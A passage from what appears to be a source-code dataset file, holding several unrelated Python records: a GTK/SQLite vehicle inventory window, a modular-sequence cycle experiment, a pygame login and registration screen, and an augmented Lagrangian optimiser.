datos[6], '%.2f' % datos[8], datos[7], datos[9], color, int( datos[10] ), datos[8]] )\n\n def vaciarCampos( self ):\n self.entryMatric.set_text( \"\" )\n self.entryMarca.set_text( \"\" )\n self.entryModelo.set_text( \"\" )\n self.entryKM.set_value( 0 )\n self.entryYear.set_value( 1980 )\n self.entryColor.set_text( \"\" )\n self.comboCombus.set_active( 0 )\n self.comboTipo.set_active( 0 )\n self.precioActual.set_text( \"0\" )\n\n def ventanaInsert( self, widget ):\n self.modo = \"I\"\n self.vaciarCampos()\n self.ventanaVehiculos.show()\n\n def ventanaEdit( self, widget ):\n \"Edita un vehiculo\"\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n c = conn.cursor()\n model, iterador = self.tvVehiculos.get_selection().get_selected()\n if iterador == None:\n Informacion.mensaje( \"Debe seleccionar un vehículo para editar\" )\n else:\n matric = model.get_value( iterador, 0 )\n marca = model.get_value( iterador, 1 )\n modelo = model.get_value( iterador, 2 )\n km = model.get_value( iterador, 3 )\n anno = model.get_value( iterador, 11 )\n color = model.get_value( iterador, 4 )\n combus = model.get_value( iterador, 5 )\n tipo = model.get_value( iterador, 6 )\n precio = model.get_value( iterador, 7 )\n\n self.entryMatric.set_text( matric )\n self.entryMarca.set_text( marca )\n self.entryModelo.set_text( modelo )\n self.ajuste.set_value( float( km ) )\n self.entryColor.set_text( color )\n self.comboCombus.set_active( 0 )\n self.comboTipo.set_active( 0 )\n self.precioActual.set_text( precio )\n self.entryYear.set_value( int( anno ) )\n\n self.modo = \"U\"\n\n self.ventanaVehiculos.show()\n\n def meterDatosBD( self, widget ):\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n try:\n matric = self.entryMatric.get_text()\n marca = self.entryMarca.get_text()\n modelo = self.entryModelo.get_text()\n km = self.entryKM.get_value()\n anno = self.entryYear.get_value()\n color = self.entryColor.get_text()\n precio = float( self.precioActual.get_text() )\n\n index = self.comboCombus.get_active()\n model = self.comboCombus.get_model()\n combus = model[index][0]\n\n index = self.comboTipo.get_active()\n model = self.comboTipo.get_model()\n tipo = model[index][0]\n\n if( ( matric != \"\" ) & ( marca != \"\" ) & ( modelo != \"\" ) & ( km != \"\" ) & ( color != \"\" ) & ( precio != \"\" ) ):\n with conn:\n c = conn.cursor()\n if ( self.modo == \"I\" ):\n sql = \"INSERT INTO tempvehiculos VALUES( ?,?,?,?,?,?,?,'Disponible',?, 0, ?) \"\n c.execute( sql, ( matric, marca, modelo, km, color, combus, tipo, precio, anno ) )\n conn.commit()\n self.listaVehiculosPedido = self.widgets.get_object( \"listCarritoPedido\" )\n self.listaVehiculosPedido.clear()\n sql = \"select * from tempvehiculos\"\n c.execute( sql )\n for datos in c:\n self.listaVehiculosPedido.append( [datos[0], datos[1], datos[2], datos[3], datos[4], datos[5], datos[6], datos[8]] )\n else:\n if( self.modo == \"U\" ):\n sql = \"UPDATE VEHICULOS SET matricula = ?, marca = ?, modelo = ?, km = ?, color = ?, combustible = ?, tipo = ?, precio = ?, anno = ? WHERE matricula = ? \"\n c.execute( sql, ( matric, marca, modelo, km, color, combus, tipo, precio, anno, matric ) )\n conn.commit()\n self.ventanaVehiculos.hide()\n self.listar( widget )\n self.vaciarCampos()\n Informacion.mensaje( \"Cambios guardados\" )\n else:\n Informacion.mensaje( \"Todos los datos son obligatorios\" )\n except sqlite3.IntegrityError:\n Informacion.mensaje( \"La matrícula introducida ya esta almacenada\" )\n\n def borrarVehiculo( self, widget ):\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n c = conn.cursor()\n model, iterador = self.tvVehiculos.get_selection().get_selected()\n if iterador == None:\n Informacion.mensaje( \"Debe seleccionar un vehículo para borrar\" )\n else:\n matr = model.get_value( iterador, 0 )\n marca = model.get_value( iterador, 1 )\n modelo = model.get_value( iterador, 2 )\n color = model.get_value( iterador, 4 )\n\n dialog = gtk.Dialog( \"Confirme borrado\", None, 0, ( gtk.STOCK_OK, gtk.RESPONSE_OK, gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL ) )\n dialog.set_default_size( 500, 300 )\n label = gtk.Label( \"Va a borrar un vehículo:\\n\\nMatrícula: \\t\\t\" + matr + \"\\nMarca: \\t\\t\" + marca + \"\\nModelo: \\t\\t\" + modelo + \"\\nColor: \\t\\t\" + color + \"\\n\\n¿Está seguro?\" )\n\n dialog.vbox.pack_start( label, True, True, 0 )\n dialog.show_all()\n\n response = dialog.run()\n dialog.destroy()\n if ( response == gtk.RESPONSE_OK ):\n c.execute( \"update vehiculos set estado ='Eliminado' WHERE matricula=?\", ( matr, ) )\n conn.commit()\n self.listar( widget )\n\n def comprobarMatricula( self, widget, data = None ):\n matricula = self.entryMatric.get_text().upper()\n self.entryMatric.set_text( matricula )\n if ( matricula != \"\" and self.modo != 'U' ):\n imagen = gtk.STOCK_YES\n\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n with conn:\n c = conn.cursor()\n sql = \"select matricula from vehiculos where matricula = ?\"\n c.execute( sql, ( matricula, ) )\n for datos in c:\n if ( matricula == datos[0] ):\n imagen = gtk.STOCK_NO\n\n self.imgMatric.set_from_stock( imagen, gtk.ICON_SIZE_SMALL_TOOLBAR )\n if imagen == gtk.STOCK_NO:\n self.bInsertar.set_sensitive( False )\n Informacion.mensaje( \"La matrícula introducida ya está almacenada.\" )\n else:\n self.bInsertar.set_sensitive( True )\n\n def imprimirListado( self, widget ):\n from fpdf import FPDF, HTMLMixin\n\n class MyFPDF( FPDF, HTMLMixin ):\n pass\n\n pdf = MyFPDF( orientation = 'L', unit = 'mm', format = 'A4' )\n pdf.add_page()\n\n pdf.set_font( 'Courier', '', 9 )\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n html = \"\"\"\n \n \n \n

    Lista de vehiculos

    \n \n \n '\n \n \n \"\"\"\n\n with conn:\n self.listaClientes = self.widgets.get_object( \"listClientes\" )\n c = conn.cursor()\n c.execute( self.sql )\n for datos in c:\n html += ''\n\n html += \"
    MatriculaMarcaModelo\"\"\" + lt( \"Año\" ) + \"\"\"KmColorCombustibleTipoProveedorPrecio
    ' + lt( str( datos[0] ) ) + '' + lt( str( datos[1] ) ) + '' + lt( str( datos[2] ) ) + '' + lt( str( datos[10] ) ) + '' + lt( str( datos[3] ) ) + '' + lt( str( datos[4] ) ) + '' + lt( str( datos[5] ) ) + '' + lt( str( datos[6] ) ) + '' + lt( str( datos[9] ) ) + '' + lt( str( datos[8] ) ) + '
    \"\n\n f1 = open( './testVehiculos.html', 'w+' )\n f1.write( html )\n f1.close()\n pdf.write_html( html )\n pdf.output( 'vehiculos.pdf' )\n\n import os\n os.system( '/usr/bin/evince vehiculos.pdf &' )\n", "sub_path": "Python/ConGesionario/Vehiculos.py", "file_name": "Vehiculos.py", "file_ext": "py", "file_size_in_byte": 12443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sqlite3.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 74, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 121, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 128, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 155, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 196, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 198, "usage_type": "call"}, {"api_name": "sqlite3.IntegrityError", "line_number": 199, "usage_type": "attribute"}, {"api_name": "Informacion.mensaje", "line_number": 200, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 203, "usage_type": "call"}, {"api_name": "Informacion.mensaje", "line_number": 210, "usage_type": "call"}, {"api_name": "gtk.Dialog", "line_number": 217, "usage_type": "call"}, {"api_name": "gtk.STOCK_OK", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.RESPONSE_OK", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.STOCK_CANCEL", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.RESPONSE_CANCEL", "line_number": 217, "usage_type": "attribute"}, {"api_name": "gtk.Label", "line_number": 219, "usage_type": "call"}, {"api_name": "gtk.RESPONSE_OK", "line_number": 226, "usage_type": "attribute"}, {"api_name": "gtk.STOCK_YES", "line_number": 235, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 237, "usage_type": "call"}, {"api_name": "gtk.STOCK_NO", "line_number": 245, "usage_type": "attribute"}, {"api_name": "gtk.ICON_SIZE_SMALL_TOOLBAR", "line_number": 247, "usage_type": "attribute"}, {"api_name": "gtk.STOCK_NO", "line_number": 248, "usage_type": "attribute"}, {"api_name": "Informacion.mensaje", "line_number": 250, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 264, "usage_type": "call"}, {"api_name": "os.system", "line_number": 295, "usage_type": "call"}]} {"seq_id": "243740318", "text": "#! /usr/bin/env -S /usr/bin/time /usr/bin/python3.9 -i\n\n# -*- coding: utf-8 -*-\n\n# Some other needed imports\nimport datetime\nimport dill\nimport gzip\nimport os\nimport pdb\nimport re\nimport sys\nimport traceback\n\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\n\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom copy import deepcopy, copy\nfrom dotmap import DotMap\nfrom functools import reduce\nfrom hashlib import sha256\nfrom io import BytesIO\nfrom memory_tempfile import MemoryTempfile\nfrom shutil import copyfile\nfrom pprint import pprint\nfrom typing import List, Set, Tuple, Dict, Union, Any\nfrom PIL import Image\n\nfrom multiprocessing.managers import SharedMemoryManager\n\nCURRENT_WORKING_DIR = os.getcwd()\nPATH_ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nHOME_DIR = os.path.expanduser(\"~\")\nTEMP_DIR = MemoryTempfile().gettempdir()\nPYTHON_PROGRAMS_DIR = os.path.join(HOME_DIR, 'git/python_programs')\n\n# set the relative/absolute path where the utils_load_module.py file is placed!\nsys.path.append(PYTHON_PROGRAMS_DIR)\nfrom utils_load_module import load_module_dynamically\n\nvar_glob = globals()\nload_module_dynamically(**dict(var_glob=var_glob, name='utils', path=os.path.join(PYTHON_PROGRAMS_DIR, \"utils.py\")))\nload_module_dynamically(**dict(var_glob=var_glob, name='utils_multiprocessing_manager', path=os.path.join(PYTHON_PROGRAMS_DIR, \"utils_multiprocessing_manager.py\")))\nload_module_dynamically(**dict(var_glob=var_glob, name='different_combinations', path=os.path.join(PYTHON_PROGRAMS_DIR, \"combinatorics/different_combinations.py\")))\nload_module_dynamically(**dict(var_glob=var_glob, name='utils_graph_theory', path=os.path.join(PYTHON_PROGRAMS_DIR, \"graph_theory/utils_graph_theory.py\")))\n\nmkdirs = utils.mkdirs\nMultiprocessingManager = utils_multiprocessing_manager.MultiprocessingManager\nget_all_combinations_repeat = different_combinations.get_all_combinations_repeat\nget_cycles_of_1_directed_graph = utils_graph_theory.get_cycles_of_1_directed_graph\n\nOBJS_DIR_PATH = os.path.join(PATH_ROOT_DIR, 'objs')\nmkdirs(OBJS_DIR_PATH)\n\nPLOTS_DIR_PATH = os.path.join(PATH_ROOT_DIR, 'plots')\nmkdirs(PLOTS_DIR_PATH)\n\ndef convert_num_to_base_num(n, b, min_len=-1):\n def gen(n):\n while n > 0:\n yield n%b; n //= b\n l = [i for i in gen(n)]\n return l if min_len == -1 else l+[0]*(min_len - len(l) if min_len > len(l) else 0)\n\ndef get_num_from_base_lst(l, b):\n n = 0\n mult = 1\n for i, v in enumerate(l, 0):\n n += v*mult\n mult *= b\n return n\n\nif __name__ == '__main__':\n # print('Hello World!')\n argv = sys.argv\n n = int(argv[1])\n m = int(argv[2])\n\n MAX_CYCLE_LEN = m**n\n\n def get_missing_tpl_a(d_tpl_a):\n s_all = set(range(0, MAX_CYCLE_LEN))\n for k in d_tpl_a:\n s_all.remove(get_num_from_base_lst(l=k, b=m))\n missing_n = list(s_all)[0]\n # print(\"- missing_n: {}\".format(missing_n))\n l_a_missing = convert_num_to_base_num(n=missing_n, b=m, min_len=n)\n tpl_a_missing = tuple(l_a_missing)\n assert tpl_a_missing not in d_tpl_a\n return tpl_a_missing\n\n # s_cycle_len = set()\n d_cycle_len = {}\n for iters in range(0, 100000):\n if iters % 1000 == 0:\n print(\"iters: {}\".format(iters))\n\n arr_a = np.random.randint(0, m, (n, ))\n\n k0 = np.random.randint(0, m, (1, ))[0]\n arr_v_k = np.random.randint(0, m, (n, ))\n\n # k0 = 0\n # arr_v_k[0] = 2\n\n l_a = arr_a.tolist()\n\n tpl_a = tuple(arr_a.tolist())\n tpl_a_prev = tpl_a\n d_tpl_a = {tpl_a: 0}\n nr_tpl_a = 1\n while True:\n a_next = (k0 + np.sum(arr_v_k * arr_a)) % m\n arr_a[:-1] = arr_a[1:]\n arr_a[-1] = a_next\n\n tpl_a_prev = tpl_a\n tpl_a = tuple(arr_a.tolist())\n \n if tpl_a in d_tpl_a:\n break\n\n d_tpl_a[tpl_a] = nr_tpl_a\n nr_tpl_a += 1\n \n cycle_len = d_tpl_a[tpl_a_prev] - d_tpl_a[tpl_a] + 1\n if cycle_len not in d_cycle_len:\n d_cycle_len[cycle_len] = {\n 'k0': k0,\n 'l_v_k': arr_v_k.tolist(),\n 'l_a': sorted(d_tpl_a.keys())[0],\n 'd_tpl_a': d_tpl_a,\n 'tpl_a': tpl_a,\n 'tpl_a_prev': tpl_a_prev,\n }\n elif cycle_len == MAX_CYCLE_LEN - 1:\n d = d_cycle_len[cycle_len]\n if 'missing_tpl_a' not in d:\n d['missing_tpl_a'] = get_missing_tpl_a(d_tpl_a=d['d_tpl_a'])\n else:\n missing_tpl_a = get_missing_tpl_a(d_tpl_a=d_tpl_a)\n l11 = list(reversed(d['missing_tpl_a']))\n l12 = list(reversed(missing_tpl_a))\n\n l21 = d['l_v_k']\n l22 = arr_v_k.tolist()\n if l11 > l12 or l11 == l12 and l21 > l22:\n d['k0'] = k0\n d['l_v_k'] = arr_v_k.tolist()\n d['l_a'] = sorted(d_tpl_a.keys())[0]\n d['d_tpl_a'] = d_tpl_a\n d['tpl_a'] = tpl_a\n d['tpl_a_prev'] = tpl_a_prev\n d['missing_tpl_a'] = missing_tpl_a\n\n l_cycle_len = sorted(d_cycle_len.keys())\n max_cycle_len = l_cycle_len[-1]\n print(f\"n: {n}, m: {m}, l_cycle_len: {l_cycle_len}\")\n\n print(f\"d_cycle_len[{max_cycle_len}]: {d_cycle_len[max_cycle_len]}\")\n", "sub_path": "modulo_sequences/vector_1d_multi_linear_sequences.py", "file_name": "vector_1d_multi_linear_sequences.py", "file_ext": "py", "file_size_in_byte": 5429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "memory_tempfile.MemoryTempfile", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils_load_module.load_module_dynamically", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 117, "usage_type": "call"}]} {"seq_id": "41997892", "text": "import os\nimport pygame\nfrom pygame.constants import KEYDOWN, K_RETURN, K_BACKSPACE, K_ESCAPE, K_TAB\n\nfrom ciu.cih.TelaMenu import TelaMenu\nfrom cln.cdp.EstiloElementos import EstiloElementos\nfrom cln.cdp.Posicao import Posicao\nfrom cln.cgt.AplPersistencia import AplPersistencia\nfrom principal.CaminhoRecursos import CaminhoRecursos\n\n_author__ = 'Hanna'\n\n\nclass ControladorCadastro:\n TAMANHO_LETRA_DADOS = 24\n POSICAOX_LETRA_DADOS = 228\n POSICAO_INICIAL_DADOS = 292\n INCREMENTA_ESPACAMENTO = 40\n TAMANHO_PALAVRA = 20\n POSICAO_SUBMIT = Posicao(372, 400)\n COR_PRETO = (0, 0, 0)\n COR_BRANCO = (255, 255, 255)\n TAMANHO_LETRA_MENU = 25\n POSICAOX_OPCAO_MENU = 115\n POSICAOY_INICIAL_OPCAO_MENU = 290\n\n def __init__(self):\n self.telamenu = TelaMenu()\n self.aplcadastrarjogador = AplPersistencia()\n self.lopcoes = [\"LOGIN:\", \"SENHA:\"]\n self.nomecorrente = []\n self.nome = \"\"\n self.posicaoimprimenome = self.POSICAO_INICIAL_DADOS\n self.imagemtela = \"\"\n self.buscar_imagem_tela()\n self.camposenha = False\n\n\n @staticmethod\n def get_imagem_geral(nomeimagem):\n return pygame.image.load(os.path.join(CaminhoRecursos.caminho_imagens_geral(), nomeimagem))\n\n def buscar_imagem_tela(self):\n self.imagemtela = self.get_imagem_geral(\"telacadastro.png\")\n\n def exibe_tela_informar_dados(self):\n self.telamenu.exibe_imagem(self.imagemtela, EstiloElementos.posicao_imagem_fundo())\n pygame.display.flip()\n\n def exibe_tela_mensagem_retorno(self, imagemtela):\n imagemtelamensagem = self.get_imagem_geral(imagemtela)\n self.telamenu.exibe_imagem(imagemtelamensagem, EstiloElementos.posicao_imagem_fundo())\n pygame.display.flip()\n\n @staticmethod\n def get_key():\n while True:\n event = pygame.event.poll()\n if event.type == KEYDOWN:\n return event.key\n\n def imprime_nome(self, dado, posicaoy):\n self.nome = \"\"\n for i in range(len(dado)):\n self.nome = self.nome + dado[i]\n palavraimpressa = self.nome\n if self.camposenha:\n palavraimpressa = \"*\" * len(self.nome)\n self.telamenu.exibe_texto_dados(palavraimpressa, self.TAMANHO_LETRA_DADOS, Posicao(self.POSICAOX_LETRA_DADOS, posicaoy))\n pygame.display.flip()\n\n def enviar_dados_jogador(self, ldadosjogador):\n return self.aplcadastrarjogador.cadastrar_jogador(ldadosjogador)\n\n def atualiza_entrada(self, ldadosjogador):\n self.exibe_tela_informar_dados()\n posicaoy = self.POSICAO_INICIAL_DADOS\n self.camposenha = False\n for dado in ldadosjogador:\n self.imprime_nome(dado, posicaoy)\n posicaoy += self.INCREMENTA_ESPACAMENTO\n if len(ldadosjogador) > 1:\n self.camposenha = True\n\n def cadastro(self):\n ldadosjogador = []\n while True:\n self.tecla = self.get_key()\n if self.tecla == K_RETURN or self.tecla == K_TAB:\n ldadosjogador.append(self.nome)\n self.nome = \"\"\n self.nomecorrente = []\n if len(ldadosjogador) == len(self.lopcoes):\n self.posicaoimprimenome = self.POSICAO_INICIAL_DADOS\n return self.enviar_dados_jogador(ldadosjogador)\n else:\n self.posicaoimprimenome = self.posicaoimprimenome + self.INCREMENTA_ESPACAMENTO\n self.camposenha = True\n elif self.tecla == K_BACKSPACE:\n if len(self.nomecorrente) > 0:\n self.nomecorrente.pop(-1)\n ldadosjogador.append(self.nomecorrente)\n self.atualiza_entrada(ldadosjogador)\n ldadosjogador.pop(-1)\n elif self.tecla == K_ESCAPE:\n return []\n elif self.tecla <= 127 and len(self.nomecorrente) < self.TAMANHO_PALAVRA:\n self.nomecorrente.append(chr(self.tecla))\n self.imprime_nome(self.nomecorrente, self.posicaoimprimenome)\n", "sub_path": "ciu/cci/ControladorCadastro.py", "file_name": "ControladorCadastro.py", "file_ext": "py", "file_size_in_byte": 4103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cln.cdp.Posicao.Posicao", "line_number": 20, "usage_type": "call"}, {"api_name": "ciu.cih.TelaMenu.TelaMenu", "line_number": 28, "usage_type": "call"}, {"api_name": "cln.cgt.AplPersistencia.AplPersistencia", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "principal.CaminhoRecursos.CaminhoRecursos.caminho_imagens_geral", "line_number": 41, "usage_type": "call"}, {"api_name": "principal.CaminhoRecursos.CaminhoRecursos", "line_number": 41, "usage_type": "name"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos.posicao_imagem_fundo", "line_number": 47, "usage_type": "call"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos", "line_number": 47, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos.posicao_imagem_fundo", "line_number": 52, "usage_type": "call"}, {"api_name": "cln.cdp.EstiloElementos.EstiloElementos", "line_number": 52, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.constants.KEYDOWN", "line_number": 59, "usage_type": "name"}, {"api_name": "cln.cdp.Posicao.Posicao", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.constants.K_RETURN", "line_number": 89, "usage_type": "name"}, {"api_name": "pygame.constants.K_TAB", "line_number": 89, "usage_type": "name"}, {"api_name": "pygame.constants.K_BACKSPACE", "line_number": 99, "usage_type": "name"}, {"api_name": "pygame.constants.K_ESCAPE", "line_number": 105, "usage_type": "name"}]} {"seq_id": "288018524", "text": "from __future__ import division, print_function, absolute_import\nimport math\nimport scipy.linalg\nimport matplotlib\nmatplotlib.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize as opt\nfrom matplotlib import rc\nrc('text', usetex=True)\n\n\ndef augmented_lagrangian(A_mats, p, n, m, k, plotting=False, printing=True, init=None):\n \"\"\"\n Returns the resulting local minimizer R of the BM problem.\n \"\"\"\n\n y = np.ones(m).reshape((-1, 1))\n R = np.random.uniform(-1, 1, size=(n, k))\n penalty = 1.0\n gamma = 10.0\n eta = .25\n target = .00000001\n vec = _Resid_vec(A_mats, m, p, R)\n v = vec.reshape((1, -1)).dot(vec)\n v_best = v\n while v > target:\n Rv = _matrix_to_vector(R)\n if printing == True:\n print('Starting L-BFGS-B on augmented Lagrangian...')\n optimizer = opt.minimize(lambda R_vec: _augmented_lagrangian_func(\n R_vec, A_mats, y, p, m, n, k, penalty), Rv, jac=lambda R_vec: _jacobian(R_vec, A_mats, p, m, n, y, penalty, k), method=\"L-BFGS-B\")\n if printing == True:\n print('Finishing L-BFGS-B on augmented Lagrangian...')\n R = _vector_to_matrix(optimizer.x, k)\n vec = _Resid_vec(A_mats, m, p, R)\n v = vec.reshape((1, -1)).dot(vec)\n if printing == True:\n print('Finish updating variables...')\n if v < eta * v_best:\n y = y - penalty * vec\n v_best = v\n else:\n penalty = gamma * penalty\n print(penalty)\n if printing == True:\n print('Augmented Lagrangian terminated.')\n return R\n\n\ndef _generate_random_rect(n, k):\n \"\"\"\n Returns a random initialization of matrix.\n \"\"\"\n\n R = np.random.uniform(-1, 1, (n, k))\n for i in range(n):\n R[i, :] = R[i, :] / np.linalg.norm(R[i, :])\n return R\n\n\ndef _basis_vector(size, index):\n \"\"\"\n Returns a basis vector with 1 on certain index.\n \"\"\"\n\n vec = np.zeros(size)\n vec[index] = 1\n return vec\n\ndef _Resid_vec(A_mats, m, p, R):\n \"\"\"\n Returns vector with constraint residuals\n \"\"\"\n vec = np.empty(m)\n Q = np.matmul(R, np.transpose(R))\n for i in range(m):\n vec[i] = np.trace(np.matmul(np.transpose(A_mats[i]),Q)) - p[i]\n return vec.reshape((-1,1))\n\n\ndef _augmented_lagrangian_func(Rv, A_mats, y, p, m, n, k, sigma):\n \"\"\"\n Returns the value of objective function of augmented Lagrangian.\n \"\"\"\n\n R = _vector_to_matrix(Rv, k)\n Resid = _Resid_vec(A_mats, m, p, R)\n first_term = np.dot(np.transpose(y), Resid)\n second_term = sigma/2.0 * np.dot(np.transpose(Resid), Resid)\n val = first_term + second_term\n\n return val\n\n\ndef _vector_to_matrix(Rv, k):\n \"\"\"\n Returns a matrix from reforming a vector.\n \"\"\"\n U = Rv.reshape((-1, k))\n return U\n\n\ndef _matrix_to_vector(R):\n \"\"\"\n Returns a vector from flattening a matrix.\n \"\"\"\n\n u = R.reshape((1, -1)).ravel()\n return u\n\n# def _take_one_row(Z, R, l):\n# Z[l,:] = R[l,:]\n# return Z\n\ndef _vec_dot_mats(mats, vec, n, m):\n \n sum = np.zeros((n,n))\n for i in range(m):\n sum = np.add(sum, vec[i]*mats[i])\n return sum\n\n\n\ndef _jacobian(Rv, A_mats, p, m, n, y, sigma, k):\n \"\"\"\n Returns the Jacobian matrix of the augmented Lagrangian problem.\n \"\"\"\n\n R = _vector_to_matrix(Rv, k)\n\n first_term = np.matmul(2.0*_vec_dot_mats(y, A_mats, n, m),R)\n\n second_term = np.matmul(2.0*sigma*_vec_dot_mats(_Resid_vec(A_mats, m, p, R), A_mats, n, m), R)\n\n jacobian = np.add(first_term, second_term)\n\n jac_vec = _matrix_to_vector(jacobian)\n \n return jac_vec.reshape((1, -1)).ravel()\n\n", "sub_path": "Augmented Lagrangian/augmented_lagrangian.py", "file_name": "augmented_lagrangian.py", "file_ext": "py", "file_size_in_byte": 3640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.use", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 19, "usage_type": "attribute"}, {"api_name": "scipy.optimize.minimize", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.trace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 136, "usage_type": "call"}]} {"seq_id": "246995937", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport abc\nimport collections\nfrom lxml import etree as et\nimport decimal\nimport datetime\nimport urllib.request, urllib.parse, urllib.error\n\nfrom . import utilities\nfrom .base import Base, MalformedPageError, InvalidBaseError, loadable\n\n\nclass MalformedMediaListPageError(MalformedPageError):\n pass\n\n\nclass InvalidMediaListError(InvalidBaseError):\n pass\n\n\nclass 